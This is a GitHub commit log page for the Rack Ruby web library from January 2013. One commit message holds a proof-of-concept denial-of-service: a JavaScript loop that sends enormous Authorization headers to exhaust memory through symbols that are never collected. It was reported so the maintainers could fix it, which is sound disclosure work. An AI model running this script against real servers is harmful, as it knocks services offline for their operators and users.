Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Commits on Jan 22, 2013
  1. @raggi

    Switch to RFC 2822 expires

    raggi authored
Commits on Jan 21, 2013
  1. @raggi

    Fix a long standing misnomer for date formats

    raggi authored
    References #414
  2. @raggi
  3. @raggi
  4. @raggi

    Merge pull request #496 from homakov/patch-3

    raggi authored
    Remove never called string
Commits on Jan 14, 2013
  1. @homakov

    Remove never called string

    homakov authored
    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
Commits on Jan 13, 2013
  1. @raggi

    Update to 1.5.0.beta.2

    raggi authored
  2. @raggi

    Update README security notes

    raggi authored
  3. @raggi
  4. @raggi

    Rack::Auth::AbstractRequest#scheme returns strings

    raggi authored
     * This is a breaking API change, but doesn't appear to be used in public
  5. @raggi

    Squash test warnings

    raggi authored
  6. @raggi
  7. @raggi

    Squash warnings in spec_auth

    raggi authored
  8. @raggi

    Reimplement auth scheme fix

    raggi authored
     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - users rails
     * Checked rack-authentication - does it's own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does it's own thing
     * Probably missed a bunch, but that'll have to do
  9. @raggi

    Revert "Merge pull request #494 from homakov/patch-2"

    raggi authored
    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
  10. @rkh

    Merge pull request #494 from homakov/patch-2

    rkh authored
    Remove .to_sym in Authorization scheme
  11. @homakov

    Remove .to_sym in Authorization scheme

    homakov authored
    Hello, `.to_sym` should never be applied on user input. Thus I recommend you to change `scheme` method:
    ```
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send enourmous emount of `Authorization` headers we can make it as long as it's possible. 
    This is PoC. App:
    ```
    cat config.ru 
    require 'rack'
    run lambda{|e|
        auth =  Rack::Auth::Basic::Request.new(e)
        puts auth.basic? if auth.provided?
        puts Symbol.all_symbols.size
        [200, {'Content-Type'=>'text/html'},['IM FINE']]
    }
    ```
    Simple Javascript to DoS it:
    ```
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0
    for(var num in base){
    	var x = new XMLHttpRequest;
    	x.open('GET','/'); 
    	str = '';
    	for(i=0;i<2000000;i++){
    	    str+='Ё'+base[num]+i;
    	}
    	x.setRequestHeader('Authorization',str+' lol')
    	x.send();
    	console.log('Total sent: ',total_sent+=str.length);
    }
    ```
    When we run JS every request carries 18888890 letters in a symbol. This 'data' will never be garbarge collectored.
    Should it be fixed?
Commits on Jan 11, 2013
  1. @raggi

    Merge branch 'hijack'

    raggi authored
    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
  2. @raggi
  3. @raggi

    Add q-value helpers for Accept headers, etc.

    raggi authored
     * Supersedes and closes #443
  4. @raggi
  5. @raggi

    Minor code review comments closing #451

    raggi authored
     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
  6. @raggi

    Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    raggi authored
    This reverts commit 3b24fa9.
  7. @raggi

    Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/…

    raggi authored
    …rack into sendfile
    
    * 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
      Set TMPDIR to fix Dir.mktmpdir under jRuby
      Additional Ruby 1.8 compaitiblity
      Make spec_sendfile work with Ruby < 1.9
      Initialize Rack::Sendfile with accel mappings
  8. @raggi

    Enable unix sockets with paths as trusted proxies

    raggi authored
     * Supersedes and closes #488
  9. @raggi

    Merge pull request #491 from spastorino/allow_build_different_session…

    raggi authored
    …_object
    
    Allow subclasses build a different Session Object
  10. @spastorino
  11. @raggi

    Merge pull request #490 from slivu/master

    raggi authored
    Added Reel Web Server and Espresso Framework to supported software list
  12. @raggi

    Merge pull request #489 from spastorino/abstract_id_tiny_patches

    raggi authored
    Abstract id tiny patches
Commits on Jan 10, 2013
  1. Update README.rdoc

    slivu authored
  2. @spastorino
  3. @spastorino
  4. @spastorino
Commits on Jan 9, 2013
  1. @spastorino
Commits on Jan 7, 2013
  1. @raggi

    Merge pull request #487 from carlosantoniodasilva/remove-warnings

    raggi authored
    Remove warnings: 'not used variable' and 'shadowing outer variable'
Something went wrong with that request. Please try again.